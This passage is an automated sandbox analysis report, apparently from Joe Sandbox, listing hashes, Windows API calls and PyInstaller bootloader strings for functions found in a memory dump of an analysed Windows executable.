                                                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                            • Opcode ID: 4ec0923ad57b9e26d950b98539eabaaac0ee0779749769c2f3ee915382542b09
                                                                                                                                                                                                                                                            • Instruction ID: b504f4c9f8c27630a086e2b5d3062aa41565d80d7b401604564f3ade9af68978
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ec0923ad57b9e26d950b98539eabaaac0ee0779749769c2f3ee915382542b09
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C551E826614BA187E7249F26E8185BBF7B1FB98B61F404121EBCE43654DF3CD146DB20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                            • Opcode ID: c2e3e1b204f81d5d3111ec2c6225d8aa08a7090ee70090e6a6c227d1fd7f1b68
                                                                                                                                                                                                                                                            • Instruction ID: 0b3905db864eed913b8b59e8602670b09ccca6369032ba901272341cf38d9395
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2e3e1b204f81d5d3111ec2c6225d8aa08a7090ee70090e6a6c227d1fd7f1b68
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8129322A0C143CAFB64BA14D954A79F672FF80754FC44075EA9947AC4EF3CE9829F21
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                            • Opcode ID: f25701e18b7e3b768cc97be4ad67ee6babc8222917340eb79faa42be88ba5edf
                                                                                                                                                                                                                                                            • Instruction ID: b1b944d4d7a564e1ee1562e13c81c25c7db521a25bbf94487336442cb775d2e5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f25701e18b7e3b768cc97be4ad67ee6babc8222917340eb79faa42be88ba5edf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60129262E0C1438EFB60BB54D854AB9F6B2FF40754FC84176E699466C4DB7CE48A8F20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                            • Opcode ID: 36300f35f55aecd370ad36ebaa49fb0f94a963389e61d921ac5c2d29b410f85f
                                                                                                                                                                                                                                                            • Instruction ID: 7024a3eb080c87ee45f5352cba82c7265f5d7049fa431ad0680534f6236d9501
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36300f35f55aecd370ad36ebaa49fb0f94a963389e61d921ac5c2d29b410f85f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B315E21B0864386FB24BB11AC00DBAE3B1EF44794FC444B1DE4D07A69EE3CE54B8B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                            • Opcode ID: aa0254fa6ad752d1b0b3ebb90ffce52311fa0a6dd2bc18c7a97eb297d781420a
                                                                                                                                                                                                                                                            • Instruction ID: 8eeae63bc8b5bf303dc05747667e06395593fac137740581acbd1174fa15f31b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa0254fa6ad752d1b0b3ebb90ffce52311fa0a6dd2bc18c7a97eb297d781420a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0ED19F32A087428AFB60AF64DD406AEB7B0FF45788F800176DA4D57B95DF38E542CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF72AA7101D), ref: 00007FF72AA78837
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF72AA7101D), ref: 00007FF72AA7888E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                            • API String ID: 626452242-27947307
                                                                                                                                                                                                                                                            • Opcode ID: da25680c1af6adbbd75f9aaa9149da67c4ccf9ada2fcee16a4d67ff34c50752a
                                                                                                                                                                                                                                                            • Instruction ID: afe38495652d52ab243025c48ae9a3c4a7cdeab0e172559ae1ee9eb2bb528519
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da25680c1af6adbbd75f9aaa9149da67c4ccf9ada2fcee16a4d67ff34c50752a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A416B32A08B8282F760EF15AC4097AE6B1FF88B90F944175DA8D47B95DF3CD596CB10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF72AA739CA), ref: 00007FF72AA78D21
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA729C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF72AA788E2,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA7101D), ref: 00007FF72AA729F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA729C0: MessageBoxW.USER32 ref: 00007FF72AA72AD0
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF72AA739CA), ref: 00007FF72AA78D95
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                                                                                                                            • Opcode ID: 24e20b950f9c341c4949047225b46873ae1dde5e69406ebada3fd8935fcb2f41
                                                                                                                                                                                                                                                            • Instruction ID: 685257fa2379797264e3cb864eed6f4b4c10e6d1001fec97b939c48ed70f8ea9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24e20b950f9c341c4949047225b46873ae1dde5e69406ebada3fd8935fcb2f41
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E218F25A08B4395FB10EF25AC408B9B6B1EF94B80FD44176CA0D47756EF3CE6428B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                                                                                                                            • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                                                                                                                            • API String ID: 3231891352-3501660386
                                                                                                                                                                                                                                                            • Opcode ID: a7b9ea968ea6d4a235862304c728b3346e2d3f1ca1720115eb11694707883f2d
                                                                                                                                                                                                                                                            • Instruction ID: ea8d98f5197ab71eb7d0f593f43764d701abf17e32dae0f38b206bb44632971b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7b9ea968ea6d4a235862304c728b3346e2d3f1ca1720115eb11694707883f2d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51517E21E0D64385FB65B7259D11EBEE2B1DF84B80FC401B1E94D866DAEE2CE5028F60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF72AA72A9B), ref: 00007FF72AA78C0A
                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF72AA779A1,00000000,?,00000000,00000000,?,00007FF72AA7153F), ref: 00007FF72AA7747F
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA72B10: MessageBoxW.USER32 ref: 00007FF72AA72BE5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF72AA77456
                                                                                                                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF72AA774DA
                                                                                                                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF72AA77493
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                                                            • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                                                            • Opcode ID: 8743f48341130adb83b05e1f6ce01007e671de32885b94e340be128834149e90
                                                                                                                                                                                                                                                            • Instruction ID: 6d133663babd878b213328dae9965a54d88b7a2c5b5b3e6d8cb2b29d46214d5a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8743f48341130adb83b05e1f6ce01007e671de32885b94e340be128834149e90
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E231A211B1978380FB61BB21ED15ABFD2B1EF88780FC44475DA4E42796EE2CE1068F20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF72AA7E46A,?,?,?,00007FF72AA7D39C,?,?,?,00007FF72AA7CF91), ref: 00007FF72AA7E23D
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF72AA7E46A,?,?,?,00007FF72AA7D39C,?,?,?,00007FF72AA7CF91), ref: 00007FF72AA7E24B
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF72AA7E46A,?,?,?,00007FF72AA7D39C,?,?,?,00007FF72AA7CF91), ref: 00007FF72AA7E275
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF72AA7E46A,?,?,?,00007FF72AA7D39C,?,?,?,00007FF72AA7CF91), ref: 00007FF72AA7E2E3
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF72AA7E46A,?,?,?,00007FF72AA7D39C,?,?,?,00007FF72AA7CF91), ref: 00007FF72AA7E2EF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                            • Opcode ID: 257efbe4257383a3eec37a8e0b20558c4c24ba0fcd14ee08d032d02959c7be2e
                                                                                                                                                                                                                                                            • Instruction ID: 4326308605762a6dd333857cbe29d8dda11fd0f6eb0a67fe722bb21e728a21f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 257efbe4257383a3eec37a8e0b20558c4c24ba0fcd14ee08d032d02959c7be2e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A31B221B1AA4295FF61AB429C0097AA3E4FF04BA0F990575DD1D4A790EF3CE8428F64
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF72AA72A9B), ref: 00007FF72AA78C0A
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA729C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF72AA788E2,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA7101D), ref: 00007FF72AA729F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA729C0: MessageBoxW.USER32 ref: 00007FF72AA72AD0
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF72AA72A9B), ref: 00007FF72AA78C90
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                                                                                                                            • Opcode ID: 83b31a2985e644c59f7e42e272613087ded70715f2d4689f177d6a205493e17b
                                                                                                                                                                                                                                                            • Instruction ID: 613ca5cd465cc1709ace2a56334ceaa2e19df47266f1f9b38c53222e23366606
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83b31a2985e644c59f7e42e272613087ded70715f2d4689f177d6a205493e17b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B214422B08A4291FB50EB29FD4046AE371FF88784F984575DA5C43B69EF2DD5528F10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                                            • Opcode ID: ef37840ed9934c1aaeb06cf917a3ae799d9876d4d923df49702be147c9d5e414
                                                                                                                                                                                                                                                            • Instruction ID: ac9030e677d9f030c33320a4b98a8ba3a959158a06ff99de33dd8c8289e32442
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef37840ed9934c1aaeb06cf917a3ae799d9876d4d923df49702be147c9d5e414
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49215E20F0A6435AFB6877219D5597DD2B1CF447B0F9046B6DA3D4A6DBDE2CA4038A20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                            • Opcode ID: c684c657c71cc66e393495913d92b804321d58ad0ed46cdbde63fde403b390ba
